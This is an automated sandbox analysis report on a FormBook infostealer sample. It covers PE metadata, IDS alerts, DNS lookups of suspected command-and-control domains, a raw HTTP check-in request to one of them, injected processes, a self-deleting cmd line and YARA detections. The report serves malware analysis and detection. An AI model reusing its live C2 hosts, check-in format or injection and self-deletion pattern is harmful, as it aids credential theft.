                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa4a3c0x4f.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x65e98.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000xc.reloc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x20000xa2a940xa2c002c8878b6a7770b75bd5d97f107c5a6abFalse0.6624603974654378data6.889045730769205IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rsrc0xa60000x65e980x660001112cf484fce173e561906dde93d5e07False0.06840724571078431data1.81233093626148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .reloc0x10c0000xc0x20055b3587c802a46f2e63fd73e61d924c2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_ICON0xa62b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.42819148936170215
                                                                                                                                                                                                                                      RT_ICON0xa67180x810Device independent bitmap graphic, 22 x 44 x 32, image size 20240.3444767441860465
                                                                                                                                                                                                                                      RT_ICON0xa6f280x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.31434426229508194
                                                                                                                                                                                                                                      RT_ICON0xa78b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.25562851782363977
                                                                                                                                                                                                                                      RT_ICON0xa89580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.17852697095435685
                                                                                                                                                                                                                                      RT_ICON0xaaf000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.13722248464808692
                                                                                                                                                                                                                                      RT_ICON0xaf1280x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.09717258776539836
                                                                                                                                                                                                                                      RT_ICON0xb85d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.07516562167277889
                                                                                                                                                                                                                                      RT_ICON0xc8df80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2703360.041630913986448505
                                                                                                                                                                                                                                      RT_GROUP_ICON0x10ae200x84data0.7121212121212122
                                                                                                                                                                                                                                      RT_VERSION0x10aea40x2acdataEnglishUnited States0.4722222222222222
                                                                                                                                                                                                                                      RT_MANIFEST0x10b1500xd48XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.38588235294117645

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2024-10-02T18:58:51.666674+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.84971434.149.87.4580TCP
                                                                                                                                                                                                                                      2024-10-02T18:58:51.666674+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.84971434.149.87.4580TCP
                                                                                                                                                                                                                                      2024-10-02T18:58:51.666674+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.84971434.149.87.4580TCP
                                                                                                                                                                                                                                      2024-10-02T19:00:00.938230+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.849737191.252.4.2080TCP
                                                                                                                                                                                                                                      2024-10-02T19:00:00.938230+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.849737191.252.4.2080TCP
                                                                                                                                                                                                                                      2024-10-02T19:00:00.938230+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.849737191.252.4.2080TCP

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.133136988 CEST4971480192.168.2.834.149.87.45
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.139826059 CEST804971434.149.87.45192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.139914036 CEST4971480192.168.2.834.149.87.45
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.146128893 CEST4971480192.168.2.834.149.87.45
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.151036978 CEST804971434.149.87.45192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.661258936 CEST4971480192.168.2.834.149.87.45
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.666621923 CEST804971434.149.87.45192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.666673899 CEST4971480192.168.2.834.149.87.45

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:31.495424032 CEST6205953192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:31.535571098 CEST53620591.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:50.911986113 CEST6000953192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.129949093 CEST53600091.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:10.912230015 CEST5423653192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:10.922224045 CEST53542361.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:31.072396994 CEST5955853192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:36.899418116 CEST5612653192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:37.148719072 CEST53561261.1.1.1192.168.2.8
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:54.247733116 CEST5674553192.168.2.81.1.1.1
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:55.088799000 CEST53567451.1.1.1192.168.2.8

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:31.495424032 CEST192.168.2.81.1.1.10xc2a3Standard query (0)www.creatievecontentpeople.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:50.911986113 CEST192.168.2.81.1.1.10xe092Standard query (0)www.mlharquitectura.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:10.912230015 CEST192.168.2.81.1.1.10x9599Standard query (0)www.cargizmos.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:31.072396994 CEST192.168.2.81.1.1.10x513Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:36.899418116 CEST192.168.2.81.1.1.10x9736Standard query (0)www.history-poker.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:54.247733116 CEST192.168.2.81.1.1.10x7c37Standard query (0)www.brasilbikeshopsc.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:31.535571098 CEST1.1.1.1192.168.2.80xc2a3Name error (3)www.creatievecontentpeople.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.129949093 CEST1.1.1.1192.168.2.80xe092No error (0)www.mlharquitectura.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.129949093 CEST1.1.1.1192.168.2.80xe092No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.129949093 CEST1.1.1.1192.168.2.80xe092No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:10.922224045 CEST1.1.1.1192.168.2.80x9599Name error (3)www.cargizmos.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:31.079313040 CEST1.1.1.1192.168.2.80x513No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:37.148719072 CEST1.1.1.1192.168.2.80x9736Name error (3)www.history-poker.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:55.088799000 CEST1.1.1.1192.168.2.80x7c37No error (0)www.brasilbikeshopsc.combrasilbikeshopsc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Oct 2, 2024 18:59:55.088799000 CEST1.1.1.1192.168.2.80x7c37No error (0)brasilbikeshopsc.com191.252.4.20A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                      • www.mlharquitectura.com

                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.84971434.149.87.45804084C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Oct 2, 2024 18:58:51.146128893 CEST168OUTGET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 HTTP/1.1
                                                                                                                                                                                                                                      Host: www.mlharquitectura.com
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:12:57:48
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\VFylJFPzqX.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\VFylJFPzqX.exe"
                                                                                                                                                                                                                                      Imagebase:0x90000
                                                                                                                                                                                                                                      File size:1'085'440 bytes
                                                                                                                                                                                                                                      MD5 hash:E9E768AA357A7E34348C69E41444964D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1471351039.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:12:57:50
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
                                                                                                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                                                                                                      File size:43'008 bytes
                                                                                                                                                                                                                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                      Start time:12:57:54
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                      Start time:12:57:57
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                                                                                                                                                                                                      Imagebase:0x1f0000
                                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                                      MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:12:58:00
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
                                                                                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:12:58:00
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:12:59:19
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228
